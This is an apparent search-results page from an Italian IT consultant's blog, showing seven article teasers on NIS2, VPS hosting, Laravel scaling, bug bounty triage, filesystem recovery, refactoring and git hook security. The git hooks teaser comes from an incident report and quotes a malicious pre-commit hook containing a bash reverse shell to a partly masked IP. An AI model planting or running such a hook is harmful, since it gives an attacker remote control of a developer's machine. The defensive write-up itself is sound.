Risultati per "programmatore smart working"
Trovati 7 risultati
-
Esigenze di Business e Affidabilità Tecnologica nell'Era Digitale
Business vs Affidabilità Digitale: guida completa su sicurezza, gestione rischi e successo nell'era tecnologica. Scopri come bilanciare innovazione e protezione.
Questo articolo fa parte della NIS2 Awareness - Dettagli tecnico/operativi sulla Direttiva UE 2022/2555 (NIS2)Se hai bisogno di un Consulente Cyber Security esperto, contattami senza impegno. Grazie alla collaborazione con un team multidisciplinare di esperti sapremo seguirti nel processo di Analisi, di Procedura, e di Implementazione delle misure tecnico-operative di adeguamento.NIS2: Obblighi, Scadenze e Strategie per la Sicurezza AziendaleNIS2 Explained: Cybersecurity Compliance for European ... continua a leggere
-
Hetzner: il miglior provider di Cloud VPS europeo nel 2026
Hetzner Cloud nel 2026: pricing CX22 da €3,79, 6 datacenter, 20 TB traffico EU, GDPR DPA gratuito. Codice sconto €20 per nuovi clienti.
Ogni sviluppatore full-stack, ogni amministratore di sistema, ogni consulente che gestisce infrastrutture cloud per clienti italiani arriva prima o poi al momento di scegliere il provider VPS principale del proprio stack operativo. Nei miei vent'anni di esperienza nel mondo delle tecnologie web ho provato la quasi totalità dei player rilevanti (Serverplan, OVH, DigitalOcean, Aruba, Contabo, Linode, Vultr), e dal 2017 il mio pellegrinaggio si è fermato definitivamente: ho scoperto H... continua a leggere
-
Digital Ocean Droplets per Laravel: sizing corretto e autoscaling senza Kubernetes
Come dimensionare correttamente i Droplet Digital Ocean per Laravel in produzione e implementare autoscaling senza la complessità di Kubernetes per PMI.
Il 12 marzo 2025 mi ha chiamato il socio di un'agenzia romana di sviluppo software che gestisce, fra gli altri progetti, un gestionale Laravel custom per un cliente attivo nel settore servizi amministrativi in outsourcing - una PMI con circa 230 utenti interni e un picco di utilizzo concentrato tra il primo e il quinto giorno di ogni mese, quando l'intero team elabora la fatturazione elettronica del mese precedente per i clienti finali. L'infrastruttura era ospitata su Digital Ocean in configura... continua a leggere
-
Bug bounty e vulnerabilità "non risolvibili" nel 2026: come triagiare DoS, brute force e rate limit con un threat model serio
Bug bounty e vulnerabilità "non risolvibili": come triagiare DoS da password lunghe, brute force e rate limit nel 2026 con un threat model serio invece di un fix infinito.
Tre anni fa ho passato due settimane a inseguire un ticket di sicurezza per un cliente del settore e-commerce. Un bug hunter aveva segnalato che il loro endpoint /password/reset permetteva di mandare 200 email di reset password al minuto verso lo stesso indirizzo, e chiedeva una bounty di 1500 euro. Il team di sviluppo aveva implementato un rate limit per IP, il bug hunter aveva girato Tor, gli avevano aggiunto un captcha, lui aveva linkato 2captcha.com con un costo a richiesta di 0.0008 dollari... continua a leggere
-
Ripristino di file system corrotti su VPS senza supporto tecnico: guida immediata Debian e Ubuntu
Filesystem ext4 corrotto su VPS Debian: diagnosi con dmesg e smartctl, rescue mode Hetzner, fsck con backup superblock, debugfs per recovery file. Caso reale PMI.
Il 28 giugno 2025, alle 7:45 di un sabato mattina, mi ha chiamato il titolare di una PMI campana - azienda di distribuzione ricambi auto con gestionale Laravel 10 su un Hetzner CX31 - perché il VPS non rispondeva più. Il pannello Hetzner Cloud mostrava il server in stato "running" ma la console VNC presentava un loop di riavvio: il kernel si avviava, tentava di montare il filesystem root ext4, falliva con EXT4-fs error: unable to read itable block, e riavviava. Il server era stato ... continua a leggere
-
Refactoring del codice legacy: perché la tua azienda ne ha bisogno per sopravvivere
Il refactoring del codice legacy è cruciale per performance, sicurezza e competitività aziendale. Scopri perché devi affrontare subito questa sfida.
In un progetto per un'azienda del settore manifatturiero, il gestionale PHP che gestiva ordini, magazzino e fatturazione era cresciuto per otto anni senza una strategia architetturale: funzioni da 400+ righe, query SQL inline con concatenazione di stringhe, zero test, dipendenze bloccate a versioni del 2017. Ogni modifica richiedeva giorni di test manuali perché nessuno sapeva quali effetti collaterali avrebbe prodotto. Abbiamo applicato un approccio incrementale ispirato allo Strangler F... continua a leggere
-
Git hooks, alias e CVE-2024-32002: come la macchina di sviluppo diventa il vettore di persistenza più sottovalutato in una PMI
Git hooks, alias e CVE-2024-32002 (clone con submodule che esegue codice): tre vettori di persistenza sulla macchina dello sviluppatore. Cosa controllare nelle PMI italiane.
A maggio 2024 ho ricevuto una segnalazione da un cliente di Treviso che gestiva un e-commerce B2B con sei sviluppatori interni. L'antivirus aziendale aveva rilevato una connessione TCP in uscita verso un IP brasiliano dalla workstation del lead developer, partita esattamente nel momento in cui aveva eseguito git commit su un repository di sviluppo. Il file .git/hooks/pre-commit di quel repository conteneva 47 byte: bash -c 'bash -i >& /dev/tcp/177.X.X.X/4444 0>&1' &. L'attaccan... continua a leggere